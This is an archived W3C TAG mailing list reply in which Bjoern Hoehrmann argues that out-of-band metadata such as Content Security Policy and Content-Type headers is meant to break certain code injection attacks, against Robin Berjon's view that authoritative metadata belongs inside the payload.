- From: Bjoern Hoehrmann <derhoermi@gmx.net>
- Date: Fri, 01 Mar 2013 03:04:51 +0100
- To: Robin Berjon <robin@w3.org>
- Cc: "www-tag@w3.org List" <www-tag@w3.org>
* Robin Berjon wrote: >I would support the TAG revisiting the topic of Authoritative Metadata, >but with a view on pointing out that it is an architectural antipattern. >Information that is essential and authoritative about the processing of >a payload should be part of the payload and not external to it. Anything >else is brittle and leads to breakage. That may be desired. Content Security Policies for instance are meant to "break" some code injection attacks against generated payloads. They are essential and authoritative, and putting them into payloads would defeat their purpose to a considerable extent as it's much easier to manipulate payloads than it is to manipulate their encapsulation. `Content-Type` as it is handled these days serves a similar purpose, you can use it to en- sure that certain payloads don't constitute an attack vector against the sites you are running. The header makes stuff break. As it is meant to. -- Björn Höhrmann · mailto:bjoern@hoehrmann.de · http://bjoern.hoehrmann.de Am Badedeich 7 · Telefon: +49(0)160/4415681 · http://www.bjoernsworld.de 25899 Dagebüll · PGP Pub. KeyID: 0xA4357E78 · http://www.websitedev.de/
Received on Friday, 1 March 2013 02:05:22 UTC